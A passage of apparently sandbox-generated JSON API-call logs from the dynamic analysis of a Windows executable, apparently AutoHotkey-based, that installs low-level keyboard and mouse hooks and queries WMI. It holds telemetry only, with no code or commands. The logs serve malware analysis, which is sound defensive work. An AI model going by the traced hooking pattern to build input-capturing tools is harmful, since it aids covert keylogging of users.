"return": "0x00000001", "arguments": [ { "name": "ProcessId", "value": "3308" }, { "name": "ThreadId", "value": "3824" }, { "name": "Message", "value": "1047" } ], "repeated": 0, "id": 651 }, { "timestamp": "2025-11-20 10:58:28,437", "thread_id": "2188", "caller": "0x14000b98b", "parentcaller": "0x14000d2a6", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "0" } ], "repeated": 6, "id": 652 }, { "timestamp": "2025-11-20 10:58:28,437", "thread_id": "3824", "caller": "0x14000c085", "parentcaller": "0x14000bd82", "category": "windows", "api": "FindWindowW", "status": false, "return": "0x00000000", "arguments": [ { "name": "ClassName", "value": "#32771" }, { "name": "WindowName", "value": "" } ], "repeated": 0, "id": 653 }, { "timestamp": "2025-11-20 10:58:28,437", "thread_id": "2188", "caller": "0x14000b98b", "parentcaller": "0x14000d2a6", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "0" } ], "repeated": 0, "id": 654 }, { "timestamp": "2025-11-20 10:58:28,437", "thread_id": "3824", "caller": "0x14000bd9d", "parentcaller": "0x00000000", "category": "system", "api": "SetWindowsHookExW", "status": true, "return": "0x002a0147", "arguments": [ { "name": "HookIdentifier", "value": "13", "pretty_value": "WH_KEYBOARD_LL" }, { "name": "ProcedureAddress", "value": "0x140006970" }, { "name": "ModuleAddress", "value": "0x140000000" }, { "name": "ThreadId", "value": "0" } ], "repeated": 0, "id": 655 }, { "timestamp": "2025-11-20 10:58:28,437", "thread_id": "2188", "caller": "0x14000b98b", "parentcaller": "0x14000d2a6", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "0" } ], "repeated": 0, "id": 656 }, { "timestamp": "2025-11-20 10:58:28,437", "thread_id": "3824", "caller": "0x14000be1b", "parentcaller": "0x00000000", "category": "system", "api": "SetWindowsHookExW", "status": true, "return": "0x001202cd", "arguments": [ { "name": "HookIdentifier", "value": "14", "pretty_value": "WH_MOUSE_LL" }, { "name": "ProcedureAddress", "value": "0x140006b90" }, { "name": "ModuleAddress", "value": "0x140000000" }, { "name": "ThreadId", "value": "0" } ], "repeated": 0, "id": 657 }, { "timestamp": "2025-11-20 10:58:28,437", "thread_id": "2188", "caller": "0x14000b98b", "parentcaller": "0x14000d2a6", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "0" } ], "repeated": 0, "id": 658 }, { "timestamp": "2025-11-20 10:58:28,437", "thread_id": "3824", "caller": "0x14000be7c", "parentcaller": "0x00000000", "category": "windows", "api": "PostThreadMessageW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessId", "value": "3308" }, { "name": "ThreadId", "value": "2188" }, { "name": "Message", "value": "1047" } ], "repeated": 0, "id": 659 }, { "timestamp": "2025-11-20 10:58:28,437", "thread_id": "2188", "caller": "0x14000ba3c", "parentcaller": "0x14000d2a6", "category": "synchronization", "api": "NtCreateMutant", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002b0" }, { "name": "MutexName", "value": "AHK Keybd" }, { "name": "InitialOwner", "value": "0" } ], "repeated": 0, "id": 660 }, { "timestamp": "2025-11-20 10:58:28,437", "thread_id": "2188", "caller": "0x14000ba7f", "parentcaller": "0x14000d2a6", "category": "synchronization", "api": "NtCreateMutant", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002b4" }, { "name": "MutexName", "value": "AHK Mouse" }, { "name": "InitialOwner", "value": "0" } ], "repeated": 0, "id": 661 }, { "timestamp": "2025-11-20 10:58:28,437", "thread_id": "2188", "caller": "0x1400ca9ff", "parentcaller": "0x14001f78e", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x053d9000" }, { "name": "RegionSize", "value": "0x00016000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 662 }, { "timestamp": "2025-11-20 10:58:28,437", "thread_id": "2188", "caller": "0x1400ca9ff", "parentcaller": "0x14008a293", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x053ef000" }, { "name": "RegionSize", "value": "0x00009000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 663 }, { "timestamp": "2025-11-20 10:58:28,437", "thread_id": "2188", "caller": "0x14007a95b", "parentcaller": "0x1400b1967", "category": "services", "api": "OpenSCManagerW", "status": true, "return": "0x008b4930", "arguments": [ { "name": "MachineName", "value": "" }, { "name": "DatabaseName", "value": "" }, { "name": "DesiredAccess", "value": "0x00000008", "pretty_value": "SC_MANAGER_LOCK" } ], "repeated": 0, "id": 664 }, { "timestamp": "2025-11-20 10:58:28,437", "thread_id": "2188", "caller": "0x14004e3fd", "parentcaller": "0x140036c64", "category": "process", "api": "NtOpenProcess", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0x000002bc" }, { "name": "DesiredAccess", "value": "0x00000200", "pretty_value": "PROCESS_SET_INFORMATION" }, { "name": "ProcessIdentifier", "value": "3308" } ], "repeated": 0, "id": 665 }, { "timestamp": "2025-11-20 10:58:28,437", "thread_id": "2188", "caller": "0x14004e410", "parentcaller": "0x140036c64", "category": "process", "api": "NtSetInformationProcess", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessInformationClass", "value": "18" }, { "name": "ProcessInformation", "value": "\\x00\\x06" } ], "repeated": 0, "id": 666 }, { "timestamp": "2025-11-20 10:58:28,437", "thread_id": "2188", "caller": "0x14004e41b", "parentcaller": "0x140036c64", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002bc" } ], "repeated": 0, "id": 667 }, { "timestamp": "2025-11-20 10:58:28,437", "thread_id": "2188", "caller": "0x1400ca9ff", "parentcaller": "0x14008a293", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x053f8000" }, { "name": "RegionSize", "value": "0x00009000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 668 }, { "timestamp": "2025-11-20 10:58:29,453", "thread_id": "2188", "caller": "0x1400825fa", "parentcaller": "0x140089aa8", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\System32\\clbcatq" }, { "name": "DllBase", "value": "0x7ffee2c20000" } ], "repeated": 0, "id": 669 }, { "timestamp": "2025-11-20 10:58:29,469", "thread_id": "2188", "caller": "0x1400825fa", "parentcaller": "0x140089aa8", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\wbemcomn" }, { "name": "DllBase", "value": "0x7ffed95e0000" } ], "repeated": 0, "id": 670 }, { "timestamp": "2025-11-20 10:58:29,469", "thread_id": "2188", "caller": "0x1400825fa", "parentcaller": "0x140089aa8", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\system32\\wbem\\wbemdisp" }, { "name": "DllBase", "value": "0x7ffed9590000" } ], "repeated": 0, "id": 671 }, { "timestamp": "2025-11-20 10:58:29,469", "thread_id": "2188", "caller": "0x1400825fa", "parentcaller": "0x140089aa8", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "API-MS-Win-Core-LocalRegistry-L1-1-0.dll" }, { "name": "BaseAddress", "value": "0x7ffee1090000" } ], "repeated": 0, "id": 672 }, { "timestamp": "2025-11-20 10:58:29,469", "thread_id": "2188", "caller": "0x1400825fa", "parentcaller": "0x140089aa8", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "C:\\Windows\\System32\\wbem\\wbemdisp.dll" }, { "name": "BaseAddress", "value": "0x7ffed9590000" } ], "repeated": 0, "id": 673 }, { "timestamp": "2025-11-20 10:58:29,469", "thread_id": "2188", "caller": "0x1400825fa", "parentcaller": "0x140089aa8", "category": "com", "api": "CoGetClassObject", "status": false, "return": "0xffffffff80040154", "arguments": [ { "name": "rclsid", "value": "172BDDF8-CEEA-11D1-8B05-00600806D9B6" }, { "name": "ClsContext", "value": "0x00000417", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER|CLSCTX_LOCAL_SERVER|CLSCTX_REMOTE_SERVER|CLSCTX_NO_CODE_DOWNLOAD" }, { "name": "riid", "value": "0000011A-0000-0000-C000-000000000046" }, { "name": "ProgID", "value": "WINMGMTS.1" } ], "repeated": 0, "id": 674 }, { "timestamp": "2025-11-20 10:58:29,469", "thread_id": "2188", "caller": "0x1400825fa", "parentcaller": "0x140089aa8", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "C:\\Windows\\System32\\advapi32.dll" }, { "name": "BaseAddress", "value": "0x7ffee2b50000" } ], "repeated": 0, "id": 675 }, { "timestamp": "2025-11-20 10:58:29,469", "thread_id": "2188", "caller": "0x1400825fa", "parentcaller": "0x140089aa8", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "172BDDF8-CEEA-11D1-8B05-00600806D9B6" }, { "name": "ClsContext", "value": "0x00000417", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER|CLSCTX_LOCAL_SERVER|CLSCTX_REMOTE_SERVER|CLSCTX_NO_CODE_DOWNLOAD" }, { "name": "riid", "value": "0000011A-0000-0000-C000-000000000046" }, { "name": "ProgID", "value": "WINMGMTS.1" } ], "repeated": 0, "id": 676 }, { "timestamp": "2025-11-20 10:58:29,484", "thread_id": "2188", "caller": "0x1400825fa", "parentcaller": "0x140089aa8", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\system32\\wbem\\wbemprox" }, { "name": "DllBase", "value": "0x7ffedc850000" } ], "repeated": 0, "id": 677 }, { "timestamp": "2025-11-20 10:58:29,484", "thread_id": "2188", "caller": "0x1400825fa", "parentcaller": "0x140089aa8", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "C:\\Windows\\System32\\wbem\\wbemprox.dll" }, { "name": "BaseAddress", "value": "0x7ffedc850000" } ], "repeated": 0, "id": 678 }, { "timestamp": "2025-11-20 10:58:29,484", "thread_id": "2188", "caller": "0x1400825fa", "parentcaller": "0x140089aa8", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "4590F811-1D3A-11D0-891F-00AA004B2E24" }, { "name": "ClsContext", "value": "0x00000001", "pretty_value": "CLSCTX_INPROC_SERVER" }, { "name": "riid", "value": "DC12A687-737F-11CF-884D-00AA004B2E24" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 679 }, { "timestamp": "2025-11-20 10:58:29,484", "thread_id": "2188", "caller": "0x1400825fa", "parentcaller": "0x140089aa8", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\system32\\wbem\\wmiutils" }, { "name": "DllBase", "value": "0x7ffedc210000" } ], "repeated": 0, "id": 680 }, { "timestamp": "2025-11-20 10:58:29,484", "thread_id": "2188", "caller": "0x1400825fa", "parentcaller": "0x140089aa8", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "C:\\Windows\\System32\\wbem\\wmiutils.dll" }, { "name": "BaseAddress", "value": "0x7ffedc210000" } ], "repeated": 0, "id": 681 }, { "timestamp": "2025-11-20 10:58:29,484", "thread_id": "2188", "caller": "0x1400825fa", "parentcaller": "0x140089aa8", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA" }, { "name": "ClsContext", "value": "0x00000001", "pretty_value": "CLSCTX_INPROC_SERVER" }, { "name": "riid", "value": "3BC15AF2-736C-477E-9E51-238AF8667DCC" }, { "name": "ProgID", "value": "" } ], "repeated": 4, "id": 682 }, { "timestamp": "2025-11-20 10:58:29,500", "thread_id": "2188", "caller": "0x1400825fa", "parentcaller": "0x140089aa8", "category": "threading", "api": "NtCreateThreadEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0x00000318" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "StartAddress", "value": "0x7ffee2fe2d30" }, { "name": "Parameter", "value": "0x008ce190" }, { "name": "CreateFlags", "value": "0x00000000" }, { "name": "ThreadId", "value": "2432" }, { "name": "ProcessId", "value": "3308" }, { "name": "Module", "value": "combase.dll" } ], "repeated": 0, "id": 683 }, { "timestamp": "2025-11-20 10:58:29,500", "thread_id": "2432", "caller": "0x7ffee347e715", "parentcaller": "0x7ffee347e37b", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00920000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 684 }, { "timestamp": "2025-11-20 10:58:29,500", "thread_id": "2432", "caller": "0x7ffee34e507d", "parentcaller": "0x7ffee34e4c43", "category": "threading", "api": "NtTestAlert", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 685 }, { "timestamp": "2025-11-20 10:58:29,500", "thread_id": "1596", "caller": "0x7ffee347e715", "parentcaller": "0x7ffee347e37b", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00923000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 686 }, { "timestamp": "2025-11-20 10:58:29,500", "thread_id": "1596", "caller": "0x7ffee34e507d", "parentcaller": "0x7ffee34e4c43", "category": "threading", "api": "NtTestAlert", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 687 }, { "timestamp": "2025-11-20 10:58:29,500", "thread_id": "1596", "caller": "0x7ffee10f6f4c", "parentcaller": "0x7ffee336ef53", "category": "system", "api": "NtDuplicateObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "SourceProcessHandle", "value": "0xffffffff" }, { "name": "SourceHandle", "value": "0xfffffffe" }, { "name": "TargetProcessHandle", "value": "0xffffffff" }, { "name": "TargetHandle", "value": "0x00000334" }, { "name": "Options", "value": "0x00000002" } ], "repeated": 0, "id": 688 }, { "timestamp": "2025-11-20 10:58:29,500", "thread_id": "1596", "caller": "0x7ffee347e715", "parentcaller": "0x7ffee347e37b", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00924000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 689 }, { "timestamp": "2025-11-20 10:58:29,500", "thread_id": "2188", "caller": "0x1400825fa", "parentcaller": "0x140089aa8", "category": "system", "api": "NtQuerySystemTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 1, "id": 690 }, { "timestamp": "2025-11-20 10:58:29,500", "thread_id": "3408", "caller": "0x7ffee347e715", "parentcaller": "0x7ffee347e37b", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00929000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 691 }, { "timestamp": "2025-11-20 10:58:29,500", "thread_id": "3408", "caller": "0x7ffee10f6f4c", "parentcaller": "0x7ffee336ef53", "category": "system", "api": "NtDuplicateObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "SourceProcessHandle", "value": "0xffffffff" }, { "name": "SourceHandle", "value": "0xfffffffe" }, { "name": "TargetProcessHandle", "value": "0xffffffff" }, { "name": "TargetHandle", "value": "0x00000348" }, { "name": "Options", "value": "0x00000002" } ], "repeated": 0, "id": 692 }, { "timestamp": "2025-11-20 10:58:29,500", "thread_id": "3408", "caller": "0x7ffee347e715", "parentcaller": "0x7ffee347e37b", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0092b000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 693 }, { "timestamp": "2025-11-20 10:58:29,531", "thread_id": "2188", "caller": "0x1400825fa", "parentcaller": "0x140089aa8", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "0000032A-0000-0000-C000-000000000046" }, { "name": "ClsContext", "value": "0x00000001", "pretty_value": "CLSCTX_INPROC_SERVER" }, { "name": "riid", "value": "00000149-0000-0000-C000-000000000046" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 694 }, { "timestamp": "2025-11-20 10:58:29,531", "thread_id": "2188", "caller": "0x1400825fa", "parentcaller": "0x140089aa8", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "00000339-0000-0000-C000-000000000046" }, { "name": "ClsContext", "value": "0x00000403", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER|CLSCTX_NO_CODE_DOWNLOAD" }, { "name": "riid", "value": "00000003-0000-0000-C000-000000000046" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 695 }, { "timestamp": "2025-11-20 10:58:29,531", "thread_id": "2188", "caller": "0x1400825fa", "parentcaller": "0x140089aa8", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\system32\\wbem\\wbemsvc" }, { "name": "DllBase", "value": "0x7ffed94f0000" } ], "repeated": 0, "id": 696 }, { "timestamp": "2025-11-20 10:58:29,531", "thread_id": "2188", "caller": "0x1400825fa", "parentcaller": "0x140089aa8", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "C:\\Windows\\System32\\wbem\\wbemsvc.dll" }, { "name": "BaseAddress", "value": "0x7ffed94f0000" } ], "repeated": 0, "id": 697 }, { "timestamp": "2025-11-20 10:58:29,531", "thread_id": "2188", "caller": "0x1400825fa", "parentcaller": "0x140089aa8", "category": "system", "api": "NtQuerySystemTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 1, "id": 698 }, { "timestamp": "2025-11-20 10:58:29,531", "thread_id": "2188", "caller": "0x1400825fa", "parentcaller": "0x140089aa8", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "api-ms-win-core-localization-l1-2-0.dll" }, { "name": "BaseAddress", "value": "0x7ffee1090000" } ], "repeated": 0, "id": 699 }, { "timestamp": "2025-11-20 10:58:29,531", "thread_id": "2188", "caller": "0x1400825fa", "parentcaller": "0x140089aa8", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "api-ms-win-core-localization-obsolete-l1-1-0.dll" }, { "name": "BaseAddress", "value": "0x7ffee1090000" } ], "repeated": 0, "id": 700 }, { "timestamp": "2025-11-20 10:58:29,594", "thread_id": "2188", "caller": "0x1400825fa", "parentcaller": "0x140089aa8", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\system32\\wbem\\fastprox" }, { "name": "DllBase", "value": "0x7ffed3fc0000" } ], "repeated": 0, "id": 701 }, { "timestamp": "2025-11-20 10:58:29,594", "thread_id": "2188", "caller": "0x1400825fa", "parentcaller": "0x140089aa8", "category": "system", "api": "NtQuerySystemTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 2, "id": 702 }, { "timestamp": "2025-11-20 10:58:29,719", "thread_id": "2188", "caller": "0x1400825fa", "parentcaller": "0x140089aa8", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "C:\\Windows\\System32\\wbem\\fastprox.dll" }, { "name": "BaseAddress", "value": "0x7ffed3fc0000" } ], "repeated": 0, "id": 703 }, { "timestamp": "2025-11-20 10:58:29,719", "thread_id": "2188", "caller": "0x1400825fa", "parentcaller": "0x140089aa8", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\amsi" }, { "name": "DllBase", "value": "0x7ffede1c0000" } ], "repeated": 0, "id": 704 }, { "timestamp": "2025-11-20 10:58:29,719", "thread_id": "2188", "caller": "0x1400825fa", "parentcaller": "0x140089aa8", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "amsi.dll" }, { "name": "BaseAddress", "value": "0x7ffede1c0000" } ], "repeated": 0, "id": 705 }, { "timestamp": "2025-11-20 10:58:29,734", "thread_id": "2188", "caller": "0x1400825fa", "parentcaller": "0x140089aa8", "category": "com", "api": "CoGetClassObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "E7D35CFA-348B-485E-B524-252725D697CA" }, { "name": "ClsContext", "value": "0x80000001", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_PS_DLL" }, { "name": "riid", "value": "D5F569D0-593B-101A-B569-08002B2DBF7A" }, { "name": "ProgID", "value": "" } ], "repeated": 1, "id": 706 }, { "timestamp": "2025-11-20 10:58:29,734", "thread_id": "2188", "caller": "0x1400825fa", "parentcaller": "0x140089aa8", "category": "com", "api": "CoGetObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Name", "value": "winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2" }, { "name": "riid", "value": "00020400-0000-0000-C000-000000000046" } ], "repeated": 0, "id": 707 }, { "timestamp": "2025-11-20 10:58:29,734", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "system", "api": "GetUserDefaultLCID", "status": true, "return": "0x00000419", "arguments": [ { "name": "SystemDefaultLangID", "value": "0x00000419" }, { "name": "LanguageName", "value": "Russian" } ], "repeated": 0, "id": 708 }, { "timestamp": "2025-11-20 10:58:29,734", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "process", "api": "NtSetInformationProcess", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessInformationClass", "value": "93" }, { "name": "ProcessInformation", "value": "\\x7f7\\x9e}" } ], "repeated": 0, "id": 709 }, { "timestamp": "2025-11-20 10:58:29,734", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "process", "api": "NtOpenSection", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "SectionHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x0000000d" }, { "name": "ObjectAttributes", "value": "sxs.dll" } ], "repeated": 0, "id": 710 }, { "timestamp": "2025-11-20 10:58:29,734", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Windows\\System32\\sxs.dll" } ], "repeated": 0, "id": 711 }, { "timestamp": "2025-11-20 10:58:29,734", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000035c" }, { "name": "DesiredAccess", "value": "0x00100021", "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\System32\\sxs.dll" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 712 }, { "timestamp": "2025-11-20 10:58:29,734", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "process", "api": "NtCreateSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000360" }, { "name": "DesiredAccess", "value": "0x0000000d", "pretty_value": "SECTION_QUERY|SECTION_MAP_READ|SECTION_MAP_EXECUTE" }, { "name": "ObjectAttributes", "value": "" }, { "name": "FileHandle", "value": "0x0000035c" }, { "name": "FileName", "value": "C:\\Windows\\System32\\sxs.dll" } ], "repeated": 0, "id": 713 }, { "timestamp": "2025-11-20 10:58:29,734", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000360" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee08c0000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x000a2000" }, { "name": "Win32Protect", "value": "0x00000080", "pretty_value": "PAGE_EXECUTE_WRITECOPY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 714 }, { "timestamp": "2025-11-20 10:58:29,734", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee095d000" }, { "name": "ModuleName", "value": "sxs.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 715 }, { "timestamp": "2025-11-20 10:58:29,734", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee093a000" }, { "name": "ModuleName", "value": "sxs.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 716 }, { "timestamp": "2025-11-20 10:58:29,734", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000360" } ], "repeated": 0, "id": 717 }, { "timestamp": "2025-11-20 10:58:29,734", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000035c" } ], "repeated": 0, "id": 718 }, { "timestamp": "2025-11-20 10:58:29,734", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee093a000" }, { "name": "ModuleName", "value": "sxs.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": 